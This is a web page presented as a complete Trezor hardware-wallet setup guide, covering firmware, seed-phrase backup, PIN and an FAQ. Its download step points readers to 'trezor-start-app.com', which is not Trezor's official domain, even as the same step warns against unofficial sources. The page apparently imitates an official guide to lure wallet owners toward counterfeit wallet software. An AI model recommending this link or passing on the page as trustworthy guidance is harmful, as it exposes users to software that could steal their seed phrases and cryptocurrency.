📅 Updated July 2025 ⏱ 30 min setup time 🎯 Complete beginner guide
This is the complete Trezor wallet setup guide for first-time users. Follow every step carefully to set up your Trezor hardware wallet securely using the official Trezor Suite app. This guide works for Trezor Model One, Model T, and Trezor Safe 3.

Before You Start — Trezor Setup Checklist

⚠️
Safety first: If your Trezor arrived without holographic seals, or if the seals appear tampered with, do not set it up. Contact Trezor support immediately. A tampered device could be compromised.

Step-by-Step Trezor Wallet First Setup

1

Unbox and Inspect Your Trezor

Carefully remove your Trezor from the packaging. Inspect the holographic security seals on the device. Check that the packaging shows no signs of tampering. The Trezor device itself should not have any firmware pre-installed — you will install it fresh through Trezor Suite.

2

Download and Install Trezor Suite

Go to trezor-start-app.com/trezor-suite-download/ and download Trezor Suite for your operating system. Install it like any regular application. Never download Trezor Suite from unofficial sources, torrent sites, or app stores.

3

Connect Trezor to Computer

Open Trezor Suite. Connect your Trezor hardware wallet to your computer using the USB cable from the box. Trezor Suite will automatically detect the connected device and display a "Let's begin" setup screen. Click the button to start.

4

Install Trezor Firmware

Trezor Suite will prompt you to install firmware on your new device. Click "Install firmware" and wait for the process to complete. Your Trezor device screen will display a fingerprint — verify it matches what Trezor Suite shows before confirming on the device.

5

Create a New Wallet

After firmware installation, Trezor Suite will ask whether to create a new wallet or recover an existing one. Choose "Create new wallet." You will then choose between a Standard wallet (single seed phrase) or a Shamir Backup wallet (multiple shares — recommended for Model T users).

6

Write Down Your Recovery Seed Phrase

This is the most critical step. Your Trezor device will display a series of 12 or 24 random words — your recovery seed phrase. Write each word on the recovery card included in the box, in the exact order displayed. Double-check every word. This is the ONLY backup of your entire wallet.

🔴
NEVER: take a photo of your seed phrase, store it on your computer or phone, enter it into any website or app, share it with anyone — including Trezor support. Your seed phrase gives complete access to all your funds. Anyone who has it can steal everything.
7

Verify Your Recovery Seed

After writing down your seed phrase, Trezor Suite will ask you to verify it by entering specific words from your seed on the device. This ensures you have written down the correct words. Take your time with this step — it verifies your backup is correct.

8

Set Your Device PIN

Create a PIN for your Trezor device. The PIN protects your device from unauthorized physical access. Enter the PIN directly on your Trezor device screen (not the computer). Choose a PIN of at least 6 digits. Longer PINs provide better protection. You will need this PIN every time you use your Trezor.

9

Name Your Trezor Device (Optional)

Trezor Suite lets you give your device a custom name (shown on the device screen). This is optional but useful if you have multiple Trezor devices. Choose any name you like.

10

Your Trezor Wallet is Ready!

Setup is complete! Trezor Suite will now show your dashboard with Bitcoin, Ethereum, and other coin accounts. You can immediately receive cryptocurrency to your new wallet. Click "Receive" to get your first wallet address, verify it on your Trezor device screen, and share it with whoever is sending you crypto.

💡
After setup: Store your physical recovery seed card in a secure location — a fireproof safe is ideal. Consider making a second copy and storing it in a different physical location. Treat it like cash or important legal documents.

Trezor Wallet Setup FAQ

How long does Trezor setup take?

The complete Trezor first-time setup typically takes 15-30 minutes, including downloading Trezor Suite, installing firmware, generating the seed phrase, and setting up a PIN. Take your time, especially when writing down your seed phrase — accuracy is critical.

Do I need internet for Trezor setup?

Yes, you need an internet connection to download Trezor Suite and install firmware on your device. However, your private keys are generated on the device itself and never transmitted over the internet.

What if I lose my Trezor after setup?

If your Trezor is lost, stolen, or damaged, you can restore your complete wallet on a new Trezor device using your recovery seed phrase. This is why the seed phrase backup is absolutely critical. Without it, if the device is lost, funds could be unrecoverable.

Can I reset and set up my Trezor again?

Yes, you can wipe and reset your Trezor at any time through Trezor Suite Settings. If you wipe the device, you will need your recovery seed phrase to restore access to your funds. Never wipe your device without having your seed phrase safely stored.
